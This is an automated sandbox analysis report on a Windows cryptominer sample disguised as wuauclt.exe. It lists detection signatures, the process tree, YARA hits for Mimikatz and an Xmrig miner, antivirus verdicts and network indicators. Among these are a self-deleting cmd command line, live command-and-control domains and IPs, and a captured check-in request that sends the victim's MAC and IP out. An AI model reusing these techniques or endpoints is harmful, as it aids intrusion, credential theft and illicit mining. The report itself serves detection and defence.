Windows Analysis Report
wuauclt.exe

Overview

General Information

Sample Name: wuauclt.exe
Analysis ID: 576901
MD5: a5cc0738a563489458f6541c3d3dc722
SHA1: c4647225139bfde320f51f7af5751c33930f3787
SHA256: 032f2e845d2b9832c7845bc6a7de650ee2148891c8ee442fe3f3a8478e588dbe

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Found stalling execution ending in API Sleep call
Found strings related to Crypto-Mining
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Injects a PE file into a foreign processes
DLL side loading technique detected
Connects to many different private IPs (likely to spread or exploit)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Creates a Windows Service pointing to an executable in C:\Windows
Writes to foreign memory regions
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Machine Learning detection for dropped file
Connects to many different private IPs via SMB (likely to spread or exploit)
Contains functionality to detect sleep reduction / modifications
Found decision node followed by non-executed suspicious APIs
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
Sigma detected: Dllhost Internet Connection
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected non-DNS traffic on DNS port
Dropped file seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Wuauclt Network Connection
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Found evaded block containing many API calls
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

  • System is w10x64
  • wuauclt.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\wuauclt.exe" MD5: A5CC0738A563489458F6541C3D3DC722)
    • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5620 cmdline: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6952 cmdline: ping 127.0.0.1 -n 5 MD5: 70C24A306F768936563ABDADB9CA9108)
      • cmd.exe (PID: 7112 cmdline: cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • svchost.exe (PID: 5008 cmdline: C:\Windows\SysWOW64\svchost.exe -k netsvcs MD5: FA6C268A5B5BDA067A901764D203D433)
    • schtasks.exe (PID: 1844 cmdline: /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 492 cmdline: /Delete /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ctfmon.exe (PID: 1744 cmdline: C:\Windows\system32\ctfmon.exe MD5: 12764C4EC54842D1790BD8FA91033268)
    • dllhostex.exe (PID: 7088 cmdline: C:\Windows\system32\dllhostex.exe MD5: D0C6EDC58729D88970CB9EE8A456457C)
      • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • SearchProtocolHost.exe (PID: 6632 cmdline: C:\Windows\system32\searchprotocolhost.exe MD5: 0C5FF66721629A124F1C9F67E18A64DB)
    • dllhost.exe (PID: 4768 cmdline: C:\Windows\system32\dllhost.exe MD5: 70E2034A1C3D0ECCB73F57E33D4BFFA0)
    • dllhost.exe (PID: 6576 cmdline: C:\Windows\system32\dllhost.exe MD5: 70E2034A1C3D0ECCB73F57E33D4BFFA0)
    • svchost.exe (PID: 3144 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • WUDHostServices.exe (PID: 4044 cmdline: C:\Windows\system32\WUDHostServices.exe MD5: FC7880429D850789E40808D1AB45C119)
    • svchost.exe (PID: 3416 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • WUDHostServices.exe (PID: 4344 cmdline: C:\Windows\system32\WUDHostServices.exe MD5: FC7880429D850789E40808D1AB45C119)
    • ctfmon.exe (PID: 5808 cmdline: C:\Windows\system32\ctfmon.exe MD5: 12764C4EC54842D1790BD8FA91033268)
    • ctfmon.exe (PID: 6160 cmdline: C:\Windows\system32\ctfmon.exe MD5: 12764C4EC54842D1790BD8FA91033268)
    • svchost.exe (PID: 3828 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • WUDHostServices.exe (PID: 3984 cmdline: C:\Windows\system32\WUDHostServices.exe MD5: FC7880429D850789E40808D1AB45C119)
  • svchost.exe (PID: 1496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1500 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3120 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Windows\SysWOW64\WUDHostServices.exe | hacktool_windows_mimikatz_copywrite | Mimikatz credential dump tool: Author copywrite@fusionrace
  • 0xad64:$s4: Build with love for POC only
  • 0xab80:$s5: gentilkiwi (Benjamin DELPY)
  • 0xacc8:$s5: gentilkiwi (Benjamin DELPY)
  • 0xadc0:$s8: kiwi flavor !
C:\Windows\SysWOW64\dllhostex.exe | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth
  • 0x12af38:$sa1: stratum+tcp://
C:\Windows\SysWOW64\dllhostex.exe | PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth
  • 0x13aaaa:$s05: --nicehash
C:\Windows\SysWOW64\dllhostex.exe | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x12cc35:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
  • 0x12c528:$s1: [%s] login error code: %d
C:\Windows\SysWOW64\dllhostex.exe | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
    Source | Rule | Description | Author | Strings
    00000010.00000000.695613920.00000000013CC000.00000008.00000001.01000000.00000005.sdmp | PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth
    • 0xaaa:$s05: --nicehash
    00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth
    • 0xe538:$sa1: stratum+tcp://
    00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
    00000010.00000000.696093152.00000000013CC000.00000008.00000001.01000000.00000005.sdmp | PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth
    • 0xaaa:$s05: --nicehash
    00000010.00000000.696628096.00000000013CC000.00000008.00000001.01000000.00000005.sdmp | PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth
    • 0xaaa:$s05: --nicehash
      Source | Rule | Description | Author | Strings
      23.2.dllhost.exe.28a2c68.1.unpack | hacktool_windows_mimikatz_copywrite | Mimikatz credential dump tool: Author copywrite@fusionrace
      • 0xc964:$s4: Build with love for POC only
      • 0xc780:$s5: gentilkiwi (Benjamin DELPY)
      • 0xc8c8:$s5: gentilkiwi (Benjamin DELPY)
      • 0xc9c0:$s8: kiwi flavor !
      2.3.svchost.exe.4b82a68.60.raw.unpack | hacktool_windows_mimikatz_copywrite | Mimikatz credential dump tool: Author copywrite@fusionrace
      • 0xd964:$s4: Build with love for POC only
      • 0xd780:$s5: gentilkiwi (Benjamin DELPY)
      • 0xd8c8:$s5: gentilkiwi (Benjamin DELPY)
      • 0xd9c0:$s8: kiwi flavor !
      2.3.svchost.exe.4f37468.18.unpack | hacktool_windows_mimikatz_copywrite | Mimikatz credential dump tool: Author copywrite@fusionrace
      • 0x9b80:$s5: gentilkiwi (Benjamin DELPY)
      33.0.ctfmon.exe.7c7468.4.unpack | hacktool_windows_mimikatz_copywrite | Mimikatz credential dump tool: Author copywrite@fusionrace
      • 0x9b80:$s5: gentilkiwi (Benjamin DELPY)
      29.0.svchost.exe.8d7468.4.unpack | hacktool_windows_mimikatz_copywrite | Mimikatz credential dump tool: Author copywrite@fusionrace
      • 0x9b80:$s5: gentilkiwi (Benjamin DELPY)

      System Summary

      Source: Process started, Author: David Burkett, Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\svchost.exe -k netsvcs, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 5008, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 3144
      Source: Network Connection, Author: bartblaze, Data: DestinationIp: 8.8.8.8, DestinationIsIpv6: false, DestinationPort: 53, EventID: 3, Image: C:\Windows\SysWOW64\dllhost.exe, Initiated: true, ProcessId: 4768, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49902
      Source: Network Connection, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: DestinationIp: 72.52.178.23, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\user\Desktop\wuauclt.exe, Initiated: true, ProcessId: 6556, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49766
      Source: Process started, Author: frack113, Data: Command: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe", CommandLine: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wuauclt.exe" , ParentImage: C:\Users\user\Desktop\wuauclt.exe, ParentProcessId: 6556, ProcessCommandLine: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe", ProcessId: 5620

      AV Detection

      Source: http://log.boreye.com/ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_Done, Avira URL Cloud: Label: malware
      Source: C:\Windows\NetworkDistribution\cnli-0.dll, Avira: detection malicious, Label: TR/ShadowBrokers.xbdrs
      Source: C:\Windows\SysWOW64\FunctionProtocolHost.dll, Avira: detection malicious, Label: HEUR/AGEN.1107841
      Source: C:\Windows\NetworkDistribution\adfw.dll, Avira: detection malicious, Label: TR/ShadowBrokers.gpoeb
      Source: C:\Windows\NetworkDistribution\adfw-2.dll, Avira: detection malicious, Label: TR/ShadowBrokers.bhlos
      Source: C:\Windows\NetworkDistribution\cnli-1.dll, Avira: detection malicious, Label: EXP/Equation.H
      Source: C:\Windows\SysWOW64\dllhostex.exe, Avira: detection malicious, Label: HEUR/AGEN.1134782
      Source: wuauclt.exe, Virustotal: Detection: 83%
      Source: wuauclt.exe, Metadefender: Detection: 54%
      Source: wuauclt.exe, ReversingLabs: Detection: 96%
      Source: wuauclt.exe, Avira: detected
      Source: C:\Windows\NetworkDistribution\adfw-2.dll, Metadefender: Detection: 83%
      Source: C:\Windows\NetworkDistribution\adfw-2.dll, ReversingLabs: Detection: 96%
      Source: C:\Windows\NetworkDistribution\adfw.dll, Metadefender: Detection: 69%
      Source: C:\Windows\NetworkDistribution\adfw.dll, ReversingLabs: Detection: 89%
      Source: C:\Windows\NetworkDistribution\cnli-0.dll, Metadefender: Detection: 75%
      Source: C:\Windows\NetworkDistribution\cnli-0.dll, ReversingLabs: Detection: 92%
      Source: C:\Windows\NetworkDistribution\cnli-1.dll, Metadefender: Detection: 75%
      Source: C:\Windows\NetworkDistribution\cnli-1.dll, ReversingLabs: Detection: 96%
      Source: C:\Windows\SysWOW64\WUDHostServices.exe, Metadefender: Detection: 33%
      Source: C:\Windows\SysWOW64\WUDHostServices.exe, ReversingLabs: Detection: 68%
      Source: C:\Windows\SysWOW64\dllhostex.exe, Metadefender: Detection: 53%
      Source: C:\Windows\SysWOW64\dllhostex.exe, ReversingLabs: Detection: 89%
      Source: wuauclt.exe, Joe Sandbox ML: detected
      Source: C:\Windows\SysWOW64\FunctionProtocolHost.dll, Joe Sandbox ML: detected
      Source: C:\Windows\SysWOW64\WUDHostServices.exe, Joe Sandbox ML: detected
      Source: C:\Windows\SysWOW64\dllhostex.exe, Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\wuauclt.exe, Code function: 0_2_002546E0 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,0_2_002546E0
      Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_6FD53DF0 CryptAcquireContextW,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureW,CryptDestroyHash,CryptReleaseContext,2_2_6FD53DF0
      Source: C:\Windows\SysWOW64\ctfmon.exe, Code function: 15_2_00964920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,15_2_00964920
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: 21_2_02FA4920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,21_2_02FA4920
      Source: C:\Windows\SysWOW64\dllhost.exe, Code function: 23_2_02864920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,23_2_02864920
      Source: C:\Windows\SysWOW64\dllhost.exe, Code function: 24_2_02E04920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,24_2_02E04920

      Exploits


      Bitcoin Miner

      Source: Yara match, File source: 16.0.dllhostex.exe.1290000.3.unpack, type: UNPACKEDPE
      Source: Yara match, File source: 16.2.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPE
      Source: Yara match, File source: 16.0.dllhostex.exe.1290000.1.unpack, type: UNPACKEDPE
      Source: Yara match, File source: 16.0.dllhostex.exe.1290000.2.unpack, type: UNPACKEDPE
      Source: Yara match, File source: 2.3.svchost.exe.5900000.9.raw.unpack, type: UNPACKEDPE
      Source: Yara match, File source: 16.0.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPE
      Source: Yara match, File source: 2.3.svchost.exe.5900000.9.unpack, type: UNPACKEDPE
      Source: Yara match, File source: 00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara match, File source: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara match, File source: 00000010.00000000.695093675.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara match, File source: 00000010.00000000.696044384.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara match, File source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000010.00000000.696614695.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara match, File source: Process Memory Space: svchost.exe PID: 5008, type: MEMORYSTR
      Source: Yara match, File source: Process Memory Space: dllhostex.exe PID: 7088, type: MEMORYSTR
      Source: Yara match, File source: C:\Windows\SysWOW64\dllhostex.exe, type: DROPPED
      Source: svchost.exe, 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
      Source: svchost.exe, 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: cryptonight.
      Source: svchost.exe, 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
      Source: wuauclt.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: wuauclt.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: C:\Users\user\Desktop\wuauclt.exe, Code function: 0_2_0025F89F FindFirstFileExA,0_2_0025F89F
      Source: C:\Windows\SysWOW64\ctfmon.exe, Code function: 15_2_0097B9D3 FindFirstFileExA,15_2_0097B9D3
      Source: C:\Windows\SysWOW64\ctfmon.exe, Code function: 15_2_0096AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,15_2_0096AA40
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: 21_2_02FAAA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,21_2_02FAAA40
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: 21_2_02FBB9D3 FindFirstFileExA,21_2_02FBB9D3
      Source: C:\Windows\SysWOW64\dllhost.exe, Code function: 23_2_0286AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,23_2_0286AA40
      Source: C:\Windows\SysWOW64\dllhost.exe, Code function: 23_2_0287B9D3 FindFirstFileExA,23_2_0287B9D3
      Source: C:\Windows\SysWOW64\dllhost.exe, Code function: 24_2_02E0AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,24_2_02E0AA40
      Source: C:\Windows\SysWOW64\dllhost.exe, Code function: 24_2_02E1B9D3 FindFirstFileExA,24_2_02E1B9D3

      Networking

      Source: Traffic, Snort IDS: 2027470 ET TROJAN Win32/Vools Variant CnC Checkin 192.168.2.4:49766 -> 72.52.178.23:80
      Source: C:\Windows\SysWOW64\svchost.exe, Domain query: date.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exe, Domain query: r.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exe, Domain query: load.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exe, Domain query: bk.estonine.com
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.50 445Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5
      Source: global traffic HTTP traffic detected: GET /ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_Done HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT) Host: log.boreye.com Cache-Control: no-cache
      Source: global traffic TCP traffic: 192.168.2.4:49935 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:49786 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:49939 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:50183 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:50094 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:50121 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:50275 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:50244 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:50067 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:50243 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:50006 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:49881 -> 72.52.178.23:53
      Source: global traffic TCP traffic: 192.168.2.4:50007 -> 72.52.178.23:53
      Source: Joe Sandbox View ASN Name: LIQUIDWEBUS LIQUIDWEBUS
      Source: Joe Sandbox View IP Address: 72.52.178.23 72.52.178.23
      Source: svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://help.disneyplus.com.
      Source: svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://disneyplus.com/legal.
      Source: svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
      Source: svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
      Source: svchost.exe, 00000026.00000003.917440832.0000023E07757000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/legal/report
      Source: svchost.exe, 00000026.00000003.917440832.0000023E07757000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.917806512.0000023E07C43000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.917507723.0000023E0778D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
      Source: unknown DNS traffic detected: queries for: log.boreye.com
      Source: C:\Users\user\Desktop\wuauclt.exe Code function: 0_2_00256450 InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetOpenA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,InternetReadFile,HttpQueryInfoA,0_2_00256450
      Source: C:\Users\user\Desktop\wuauclt.exe Code function: 0_2_002546E0 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,0_2_002546E0
      Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_6FD53DF0 CryptAcquireContextW,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureW,CryptDestroyHash,CryptReleaseContext,2_2_6FD53DF0
      Source: C:\Windows\SysWOW64\ctfmon.exe Code function: 15_2_00964920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,15_2_00964920
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 21_2_02FA4920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,21_2_02FA4920
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 23_2_02864920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,23_2_02864920
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 24_2_02E04920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,24_2_02E04920

      System Summary

      Source: 23.2.dllhost.exe.28a2c68.1.unpack, type: UNPACKEDPE Matched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.522c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.0.svchost.exe.8e2c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7d2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.8.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7d2c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.2897468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.11.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.2.svchost.exe.8d7468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.12.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.792c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.2.dllhost.exe.2e37468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.9a2c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.522c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.2.SearchProtocolHost.exe.2fd7468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.57b7468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.39.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fa0000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 16.0.dllhostex.exe.1290000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 2.3.svchost.exe.5780000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
